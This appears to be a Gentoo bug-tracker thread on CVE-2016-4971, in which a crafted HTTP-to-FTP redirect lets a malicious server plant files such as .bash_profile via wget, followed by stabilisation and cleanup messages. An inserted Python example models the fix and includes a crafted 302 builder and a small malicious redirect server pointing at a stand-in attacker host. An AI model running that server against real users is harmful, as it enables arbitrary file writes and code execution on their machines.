From ${URL} :

GNU Wget (including the latest version), when supplied with a malicious website link, can be tricked into saving an arbitrary remote file supplied by an attacker, with arbitrary contents and filename, under the current directory. This can lead to potential code execution by creating system scripts (such as .bash_profile and others) within the home directory, as well as other unauthorized actions (such as request sniffing by proxy modification, or arbitrary system file retrieval) by uploading a .wgetrc configuration file.

Because of a lack of sufficient controls in wget, when a user downloads a file with wget, such as:

    wget http://attackers-server/safe_file.txt

an attacker who controls the server could make wget create an arbitrary file with arbitrary contents and filename by issuing a crafted HTTP 30X Redirect containing an FTP server reference in response to the victim's wget request. For example, if the attacker's server replies with the following response:

    HTTP/1.1 302 Found
    Cache-Control: private
    Content-Type: text/html; charset=UTF-8
    Location: ftp://attackers-server/.bash_profile
    Content-Length: 262
    Server: Apache

wget will automatically follow the redirect and will download a malicious .bash_profile file from a malicious FTP server. It will fail to rename the file to the originally requested filename of 'safe_file.txt', as it would normally do in case of a redirect to another HTTP resource with a different name. Because of this vulnerability, an attacker is able to upload an arbitrary file with an arbitrary filename to the victim's current directory.

@maintainer(s): since the fixed package is already in the tree, please let us know if it is ready for stabilization or not.
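The following is an added example, not part of the bug thread and not wget's own source. It models the local-filename choice the advisory describes: before 1.18, a redirect from HTTP to HTTP kept the originally requested name, but a redirect that landed on an ftp:// URL was saved under the name taken from the FTP URL; from 1.18 on, the name always comes from the URL the user typed unless --trust-server-names is passed. It also builds the attacker's crafted 302 response and shows a guard a downloader can apply. The hostnames and URLs are assumed for illustration.

```python
# Added example (not from the bug thread or from wget's source): a model of how
# wget chose the local file name on an HTTP -> FTP redirect before and after the
# CVE-2016-4971 fix, the attacker's crafted 302, and a guard for downloaders.
# Hostnames and URLs below are made up.
import posixpath
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit


def url_basename(url: str) -> str:
    """Last path component of a URL, percent-decoded; 'index.html' for a path
    that ends in '/' (the fallback name wget uses in that case)."""
    name = posixpath.basename(unquote(urlsplit(url).path))
    return name or "index.html"


def local_name_vulnerable(requested_url: str, final_url: str) -> str:
    """wget < 1.18: a redirect to another HTTP resource keeps the originally
    requested name, but a redirect that lands on an ftp:// URL is saved under
    the name taken from that FTP URL. This is the defect behind CVE-2016-4971."""
    if urlsplit(final_url).scheme == "ftp":
        return url_basename(final_url)
    return url_basename(requested_url)


def local_name_fixed(requested_url: str, final_url: str,
                     trust_server_names: bool = False) -> str:
    """wget >= 1.18: the name is derived from the URL the user gave, whatever
    the redirect target, unless --trust-server-names was given explicitly."""
    return url_basename(final_url if trust_server_names else requested_url)


def redirect_is_suspicious(requested_url: str, location: str) -> bool:
    """Guard for any client that honours server-supplied names: flag a redirect
    that switches the scheme to ftp:// or that would create a dotfile."""
    req, loc = urlsplit(requested_url), urlsplit(location)
    scheme_downgrade = loc.scheme == "ftp" and req.scheme != "ftp"
    return scheme_downgrade or url_basename(location).startswith(".")


def craft_redirect(ftp_url: str) -> bytes:
    """Attacker side: the raw 302 from the advisory, pointing an innocuous
    HTTP request at a file on the attacker's FTP server."""
    body = b"<html><body>Moved</body></html>\n"
    headers = (
        "HTTP/1.1 302 Found\r\n"
        "Cache-Control: private\r\n"
        "Content-Type: text/html; charset=UTF-8\r\n"
        f"Location: {ftp_url}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Server: Apache\r\n"
        "\r\n"
    )
    return headers.encode("ascii") + body


class RedirectHandler(BaseHTTPRequestHandler):
    """Minimal malicious HTTP server: every GET is answered with the crafted 302."""
    target = "ftp://attackers-server/.bash_profile"  # assumed attacker host

    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", self.target)
        self.send_header("Content-Length", "0")
        self.end_headers()


if __name__ == "__main__":
    # Constructed walk-through of the advisory's scenario.
    requested = "http://attackers-server/safe_file.txt"
    location = "ftp://attackers-server/.bash_profile"
    print("wget < 1.18 saves as :", local_name_vulnerable(requested, location))
    print("wget >= 1.18 saves as:", local_name_fixed(requested, location))
    print("suspicious redirect  :", redirect_is_suspicious(requested, location))
    print(craft_redirect(location).decode())
    # Serve the crafted redirect locally; pointing a pre-1.18 wget at it still
    # needs a real FTP server on the redirect target holding .bash_profile.
    HTTPServer(("127.0.0.1", 8080), RedirectHandler).serve_forever()
```

To verify a fixed build, fetch a URL whose server answers with a 302 to an ftp:// location and confirm the file lands under the originally requested name; only an explicit --trust-server-names should make wget 1.18 or later adopt the redirect target's name.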
I added 1.18 last night. Should be fine for stable.
Stable on alpha.
@arches, please stabilize: =net-misc/wget-1.18
Stable for PPC64.
Stable for HPPA.
arm stable
amd64 stable
x86 stable
CVE-2016-4971 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4971): GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource.
Added to existing GLSA.
ppc stable
sparc stable
ia64 stable. Maintainer(s), please cleanup. Security, please add it to the existing request, or file a new one.
Arches, thank you for your work. Added to an existing GLSA request. Maintainer(s), please drop the vulnerable version(s). Version: 1.17.1-r1 : 0
This issue was resolved and addressed in GLSA 201610-11 at https://security.gentoo.org/glsa/201610-11 by GLSA coordinator Kristian Fiskerstrand (K_F).
Reopening for Cleanup - Version wget-1.17.1-r1 still in tree.
commit 98185b2fdd2323a4242c46a396174e9eb5409b17
Author: Lars Wendler <polynomial-c@gentoo.org>
Date:   Mon Oct 31 08:11:21 2016

    net-misc/wget: Removed vulnerable version.

    Package-Manager: portage-2.3.2
    Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
Thanks!